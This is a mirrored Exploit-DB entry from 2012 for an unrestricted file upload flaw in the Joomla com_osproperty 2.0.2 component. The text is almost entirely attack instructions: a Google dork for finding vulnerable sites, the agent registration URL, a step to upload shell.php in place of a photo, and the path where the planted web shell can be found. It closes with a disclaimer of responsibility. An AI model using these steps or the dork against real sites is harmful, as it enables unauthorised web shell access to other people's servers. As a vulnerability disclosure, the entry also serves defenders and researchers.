Joomla! Component com_osproperty 2.0.2 – Unrestricted Arbitrary File Upload

• Exploit Database
• 116 阅读

• 作者： D4NB4R
  日期： 2012-07-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19829/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

  _______________________________________________________________________________________ Exploit Title: Joomla com_osproperty Unrestricted File Upload   Google Dork: com_osproperty   Date: [13-07-2012]   Author: Daniel Barragan "D4NB4R"   Twitter: @D4NB4R   site: http://www.insecurityperu.org/&http://poisonsecurity.wordpress.com/   Vendor: Ossolution Team http://extensions.joomla.org/   Version: 2.0.2 (last update on Jul 12, 2012)   License: Commercial $ 28.86us Tested on: [Linux(arch)-Windows(7ultimate)]     1.Go to this route Ingrese a esta ruta http://site/component/osproperty/?task=agent_register     2.Complete the form, raising the shell.php instead of your photo Complete el formulario, subiendo la shell.php en lugar de su foto     3.Locate your file in the root /osproperty/agent/ Busque su archivo en la raiz /osproperty/agent/ http://site/images/osproperty/agent/randomid_yourshell.php     Help:This path can help you find your web shell in case you need it Este path le puede ayudar a encontrar su web shell en caso q lo necesite   component/osproperty/?task=agent_default   Im not responsible for which is given No me hago responsable del uso que se le de _______________________________________________________________________________________ Daniel Barragan "D4NB4R"2012